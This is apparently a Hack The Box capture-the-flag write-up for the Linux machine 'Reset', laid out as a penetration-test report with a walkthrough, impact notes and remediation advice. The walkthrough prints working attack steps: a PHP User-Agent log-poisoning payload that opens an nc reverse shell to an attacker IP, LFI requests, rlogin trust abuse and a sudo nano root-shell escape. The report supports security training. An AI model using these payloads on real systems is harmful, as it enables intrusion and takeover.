← Writeups
HTB - Reset badge

2026-05-11 • htb • easy • linux

HTB - Reset

An unauthenticated password-reset endpoint discloses a new password for the admin account, granting access to a dashboard that exposes a file-read LFI via a path parameter. Poisoning the Apache access log with a PHP payload in the User-Agent header yields RCE as www-data. Lateral movement to sadm is achieved through the legacy rlogin service on port 513. Privilege escalation abuses an attached tmux session combined with a sudo rule on nano, which permits spawning a root shell via nano's command-execution feature.

password-resetlfilog-poisoningrlogintmux-hijacksudo-abusegtfobins nmapburpsuiterloginpenelope

Hack The Box — Reset

Easy | Linux | Hack The Box

FieldValue
Report Date11 May 2026
Assessed ByRobInTheHood
Target IP10.129.234.130
Hostnamereset
DomainN/A

Table of Contents

  1. Executive Summary
  2. Scope
  3. Methodology
  4. Attack Chain Summary
  5. Findings
  6. Proof of Access
  7. Credentials Discovered
  8. Impact Assessment
  9. Remediation Summary
  10. Key Takeaways
  11. Tools Used
  12. Disclaimer

1. Executive Summary

This report documents the compromise workflow for the Hack The Box machine Reset. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.

A PHP web application exposes an unauthenticated password-reset endpoint that, when invoked with the username admin, returns the newly-generated password in the HTTP response body. The resulting authenticated session reveals a dashboard.php log-viewer that accepts a server-side file parameter, constituting a Local File Inclusion. By poisoning the Apache access.log with a PHP payload embedded in the User-Agent header and then including the log via the LFI, remote code execution is achieved as www-data. The legacy rlogin service on port 513 is used to authenticate laterally as the sadm user via host-trust. Finally, an attached tmux session held by sadm combined with a sudo rule permitting nano /etc/firewall.sh is abused via nano’s built-in command execution (Ctrl+R, Ctrl+X) to spawn a root shell.

2. Scope

FieldValue
Target IP10.129.234.130
Hostnamereset
DomainN/A
Operating SystemLinux (Ubuntu 22.04.5 LTS)
Machine RatingEasy
EnvironmentHack The Box — Authorised Training Lab
Assessment Date11 May 2026
AssessorRobInTheHood

3. Methodology

  • Reconnaissance — service discovery and external attack-surface mapping
  • Enumeration — credential, configuration, and trust-path analysis
  • Exploitation — initial access through validated vulnerability paths
  • Lateral Movement — privilege pivoting and cross-context execution
  • Privilege Escalation — full compromise to root/SYSTEM context
  • Post-Exploitation — proof collection and impact-oriented validation

4. Attack Chain Summary

PhaseTechniqueMITRE ATT&CK
ReconNmap — SSH on 22, HTTP on 80, exec/login/shell on 512/513/514T1046
EnumerationWeb enumeration of PHP login page → discovery of password-reset endpointT1083
Initial AccessPassword-reset disclosure for admin → authenticated dashboardT1078
ExploitationLFI on file parameter → Apache log poisoning via User-Agent PHP payload → RCE as www-dataT1190 · T1059.004
Lateral Movementrlogin (port 513) as sadm via host-trustT1021
Privilege EscalationAttached tmux session + sudo nano → command execution via Ctrl+R/Ctrl+XT1548.003 · T1059.004

5. Findings

F-01 — Technical Walkthrough

Reconnaissance

nmap -Pn -v -sS -p- -oN nmap.txt 10.129.234.130
PortService
22/tcpSSH
80/tcpHTTP
512/tcpexec (rexec)
513/tcplogin (rlogin)
514/tcpshell (rsh)

The presence of the BSD r-services (512/513/514) is highly unusual on a modern host and immediately signals a potential trust-based lateral movement vector.

Enumeration — Web Application

Port 80 serves a PHP login page that exposes a “reset password” functionality. Issuing a reset request against the admin account returns the freshly-generated password directly in the HTTP response body:

HTTP/1.1 200 OK
Date: Sat, 09 May 2026 22:55:00 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 80
Content-Type: application/json

{"username":"admin","new_password":"58ed7ae9","timestamp":"2026-05-09 22:55:00"}

Authenticating with admin:58ed7ae9 redirects the session to dashboard.php, which provides a log viewer offering two preset options: syslog and auth.log.

Local File Inclusion

Inspection of the dashboard request in Burp Suite reveals that the log-viewer transmits the absolute path of the requested log via a file POST parameter:

POST /dashboard.php HTTP/1.1
Host: 10.129.234.130
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=trah3d32vq4suijk1bt3fch815

file=%2Fvar%2Flog%2Fsyslog

The parameter is not constrained server-side, allowing arbitrary file inclusion. Because Apache 2.4 serves the application, the Apache access log is requested:

file=%2fvar%2flog%2fapache2%2faccess.log

The response confirms read access, with request entries echoed verbatim including the User-Agent header.

Initial Access — Log Poisoning via User-Agent

Apache writes each request’s User-Agent value into access.log unsanitised. Because the included file is interpreted as PHP via the LFI, embedding a <?php ... ?> payload in the User-Agent and then including the log file triggers code execution.

Stage 1 — poison the log with a reverse-shell payload:

GET /dashboard.php HTTP/1.1
Host: 10.129.234.130
User-Agent: <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.179 4444 >/tmp/f'); ?>

Stage 2 — include the poisoned log to execute the payload:

POST /dashboard.php HTTP/1.1
Host: 10.129.234.130
Content-Type: application/x-www-form-urlencoded

file=%2fvar%2flog%2fapache2%2faccess.log

A reverse shell as www-data is received on the listener:

[May 11, 2026 - 14:33:37 (EDT)] exegol-Reset /workspace # penelope -i tun_htb 4444
[+] Listening for reverse shells on 10.10.14.179:4444
[+] Got reverse shell from reset~10.129.234.130-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/python3!

User Flag

The user flag is readable directly from the initial foothold context:

www-data@reset:/var/www/html$ cat /home/sadm/user.txt
19ba954c8ba8400cbfc0277f5f1669a4

Lateral Movement — rlogin to sadm

The Nmap scan flagged the BSD r-services on 512/513/514. The rlogin daemon (513) authenticates clients based on a ~/.rhosts//etc/hosts.equiv trust relationship combined with the client-side Unix username — no password is required when the trust is satisfied.

To make rlogin advertise the username sadm to the target, a local user named sadm is created on the attacking host and used to issue the connection:

exegol-Reset /workspace # sudo su sadm
sadm@exegol-Reset:/workspace$ rlogin 10.129.234.130 -l sadm

Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-140-generic x86_64)
Last login: Mon May 11 17:50:24 UTC 2026 from 10.10.14.179 on pts/0
sadm@reset:~$

The local Unix account is required because the rlogin client transmits its current effective username; without a matching local sadm, the trust check on the server fails.

Privilege Escalation — tmux Session + Sudo nano

Process enumeration shows a detached tmux session owned by sadm:

sadm@reset:~$ ps auxf | grep tmux
sadm  1180  0.0  0.2  8784  4076 ?  Ss  13:05  0:00 tmux new-session -d -s sadm_session

Attaching to the session inherits its environment:

sadm@reset:~$ tmux a -t sadm_session

Within the session, sudo -l reveals a high-impact rule:

User sadm may run the following commands on reset:
    (root) NOPASSWD: /usr/bin/nano /etc/firewall.sh

GNU nano exposes a built-in command-execution shortcut: pressing Ctrl+R (read file) followed by Ctrl+X (execute command) opens a prompt that runs an arbitrary shell command in the context of the running editor — in this case, root.

Spawning an interactive shell from inside the editor:

Command to execute: reset; bash 1>&0 2>&0

This yields a root shell:

root@reset:/home/sadm# id
uid=0(root) gid=0(root) groups=0(root)

root@reset:/home/sadm# cat /root/root_279e22f8.txt
7ad6951bcb5a2edaffd7908b013d29b0

6. Proof of Access

LevelEvidence
User19ba954c8ba8400cbfc0277f5f1669a4
Root7ad6951bcb5a2edaffd7908b013d29b0

7. Credentials Discovered

AccountSecretTypeSource
admin58ed7ae9Web application passwordPassword-reset response disclosure
sadmhost-trust (rlogin)Implicit BSD r-services trust/etc/hosts.equiv / ~/.rhosts

8. Impact Assessment

Successful exploitation resulted in full system-level compromise through a four-stage chain: an unauthenticated password-reset endpoint that returns the new credential in-band, a server-side file-inclusion in the authenticated dashboard, abuse of Apache log writes to bridge LFI to RCE, and a privileged editor invoked via sudo. None of these vulnerabilities individually requires advanced tooling, and the entire chain is reproducible against any host that combines these primitives.

9. Remediation Summary

PriorityAction
CriticalNever return generated passwords in HTTP responses; deliver out-of-band (email/SMS) and require a one-time reset link rather than a direct credential disclosure.
CriticalValidate the file parameter against a strict allow-list (e.g., syslog, auth.log) and forbid absolute paths; better still, eliminate user-controlled file selection from the dashboard entirely.
CriticalDisable the BSD r-services (rexec, rlogin, rsh); they transmit credentials and trust state in cleartext and are obsolete.
HighRemove the sudo rule permitting nano to be executed as root, or replace nano with a constrained editor that disables command execution.
HighAudit user-owned tmux/screen sessions; prevent shared sessions from persisting unattended.
MediumEnable Apache mod_security or equivalent WAF rules to detect log-poisoning payloads in headers.

10. Key Takeaways

  • In-band disclosure of generated credentials in password-reset flows is equivalent to having no reset protection at all.
  • An LFI becomes RCE the moment the attacker can write attacker-controlled data into any file the inclusion can reach — server access logs are the canonical sink.
  • Legacy BSD r-services treat the client-supplied username as ground truth; preserving them in 2026 effectively grants any neighbouring host a free authentication primitive.
  • GTFOBins-style escalation via editors invoked with sudo remains one of the most reliable privilege escalation paths on Linux — nano, vi, less, and more all expose command execution from within their UI.

11. Tools Used

ToolPurpose
nmapPort and service discovery
Burp SuiteRequest inspection and parameter tampering for LFI and log poisoning
penelopeReverse shell listener and PTY upgrade
rloginLateral movement via legacy host-trust
tmuxSession attach for privilege inheritance

12. Disclaimer

This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.

End of Report — Reset | RobInTheHood | 11 May 2026